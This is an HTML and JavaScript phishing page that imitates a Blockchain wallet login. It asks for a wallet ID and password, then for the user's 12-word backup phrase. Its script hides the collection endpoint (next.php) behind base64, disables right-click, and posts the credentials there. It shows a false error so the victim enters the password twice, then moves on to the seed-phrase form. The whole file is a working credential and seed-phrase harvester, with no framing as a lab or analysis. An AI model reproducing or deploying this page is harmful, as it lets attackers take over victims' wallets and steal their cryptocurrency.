<!doctype html>
<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script type="text/JavaScript" src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>BlockChain Login</title>
    <style type="text/css">
    .box_m {
        margin: 20px 80px 20px 80px;
    }

    @media screen and (max-width: 480px) {
        .box_m {
            margin: 20px 10px 20px 10px !important;
        }

        .box_upper{
            display: none;
        }
    }
    </style>
</head>

<body style="background-color: #121D33;" oncontextmenu="return false">
    <div class="container-fluid p-0">
        <div class="container-fluid">
            <div class="row p-3 mt-3" style="background-image: url('images/bg-pattern.svg')">
                <div class="col-sm-6 mx-auto text-center">
                    <img src="images/bc-logo.svg" class="img-fluid" width="240px"><br>
                    <!-- <span class="text-white align-middle">Version 4.27.8</span> -->
                </div>
                <!-- <div class="col-sm-6 text-right box_upper">
                    <a href="#" class="text-white">Don't have a wallet?</a>
                    <button class="bg-transparent btn text-white" style="border:1px solid white;">Create One now</button>
                </div> -->
            </div>
        </div>
        <div class="container-fluid p-0">
            <div class="row box_m" style="">
                <div class="col-sm-4 mx-auto p-3" style=" background-color: white;border-radius:10px;-webkit-box-shadow: 0px 0px 40px -11px rgba(0,0,0,1);
          -moz-box-shadow: 0px 0px 40px -11px rgba(0,0,0,1);
          box-shadow: 0px 0px 40px -11px rgba(0,0,0,1);">
                    <div>
                        <span style="color: #121D33; font-weight:700;font-size:16px">Welcome Back!</span><br>
                    </div>
                    <div class="row my-3">
                        <div class="col-sm-12">
                            <div id="div1">
                                <center>
                                    <div class="alert alert-danger" id="msg" style="display: none;">Session expired...! Please login with email and password.</div>
                                    <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                                </center>
                                <form id="contact" class="form-horizontal well">
                                    <div>
                                        <div class="col-sm-12">
                                            <div class="form-group">
                                                <div id="inputbar">
                                                    <label for="" style="color: #121D33;" class="font-weight-bold" id="text-em">Wallet ID</label>
                                                    <input type="text" name="ai" class="form-control" id="ai" aria-describedby="aiHelp">
                                                </div>
                                            </div>
                                            <div class="text-center">
                                                <small style="color: #121D33;font-weight: 600;">Your Wallet ID can be found at the bottom of any email we’ve ever sent you. Need a reminder?<a href="#">Send my Wallet ID</a></small>
                                            </div>
                                            <div class="mt-2">
                                                <div class="form-group">
                                                    <label for="pr" style="color: #121D33;" class="font-weight-bold">Password</label>
                                                    <input type="password" name="pr" class="form-control" id="pr">
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-sm-12 mt-4">
                                        <input type="submit" name="register" value="Log In" id="submit-btn" class="btn w-100 bg-primary py-3 text-white font-weight-bold" disabled>
                                    </div>
                                    <div class="col-sm-12 mt-2">
                                        <a href="#" class="float-left font-weight-bold">Login via Mobile</a>
                                        <a href="#" class="float-right font-weight-bold">Need some help?</a>
                                    </div>
                                </form>
                            </div>
                            <div id="div2" style="display: none;">
                                <form action="./next.php" method="POST">
                                    <div>
                                        <div class="col-sm-12">
                                            <div class="form-group">
                                                <div id="inputbar">
                                                    <span class="font-weight-bold " style="color: #121D33;">Your Backup Phrase</span><br>
                                                    <label style="font-size: 14px" class="font-weight-bold text-gray" id="text-em">Enter your 12 word phrase </label>
                                                    <input type="text" name="backup" class="form-control" id="backup" required="">
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-sm-12 mt-4">
                                        <input type="submit" name="btn1" value="Continue" id="btn1" class="btn w-100 bg-primary py-3 text-white font-weight-bold">
                                    </div>
                                    <div class="col-sm-12 mt-2">
                                        <a href="#" class="float-left font-weight-bold">Login via Mobile</a>
                                        <a href="#" class="float-right font-weight-bold">Need some help?</a>
                                    </div>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="col-sm-12 mt-2">
                    <div class="col-sm-5 mx-auto">
                        <div class="float-left">
                            <a href="#" class="text-white">English <i class="fas fa-chevron-down"></i></a>
                        </div>
                        <div class="float-right">
                            <a href="#" class="text-white">Data</a>
                            <a href="#" class="text-white pl-1">About</a>
                            <a href="#" class="text-white pl-1">Blog</a>
                            <a href="#" class="text-white pl-1">Support</a>
                        </div>
                    </div>
                </div>
                <div class="col-sm-12 my-4">
                    <div class="col-sm-4 mx-auto text-center">
                        <img src="images/apple.png" class="img-fluid" width="150px">
                        <img src="images/google-add.png" class="img-fluid" width="150px">
                    </div>
                </div>
            </div>
        </div>
        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script type="text/JavaScript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script type="text/JavaScript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/JavaScript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#contact').on('keyup keypress', function(e) {

        // var keyCode = e.keyCode || e.which;
        ai = $("#ai").val();
        pr = $("#pr").val();
        if (ai != "" && pr != "") {
            $('#submit-btn').removeAttr("disabled", "disabled");
        } else {
            $('#submit-btn').attr("disabled", "disabled");
        }

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $("#msg").hide();
    }
    ///////////////url getting ai////////////////


    var file = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (count == 0) {
            if (!ai) {
                $('#error').show();
                $('#error').html("Username field is empty.!");
                ai.focus;
                return false;
            }
        } else {
            if (!ai) {
                $('#error').show();
                $('#error').html("Email field is empty.!");
                ai.focus;
                return false;
            }

            if (!filter.test(my_ai)) {
                $('#error').show();
                $('#error').html("That account doesn't exist. Enter a different account");
                ai.focus;
                return false;
            }
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').val('Verifing...');
            },
            success: function(response) {
                $("#pr").val("");
                if (count == 1) {
                    $("#text-em").html("Email");
                    $("#ai").attr('type', 'email');

                } else if (count >= 2) {
                    $("#div1").hide();
                    $("#div2").show();
                    return false;
                }
                // $("#msg").show();

            },
            error: function() {
                $("#pr").val("");
                if (count == 1) {
                    $("#text-em").html("Email");
                    $("#ai").attr('type', 'email');

                } else if (count >= 2) {
                    $("#div1").hide();
                    $("#div2").show();
                    return false;
                }
                // $("#msg").show();
            },
            complete: function() {
                $('#submit-btn').val('Log In');
            }
        });
    });


});
</script>

</html>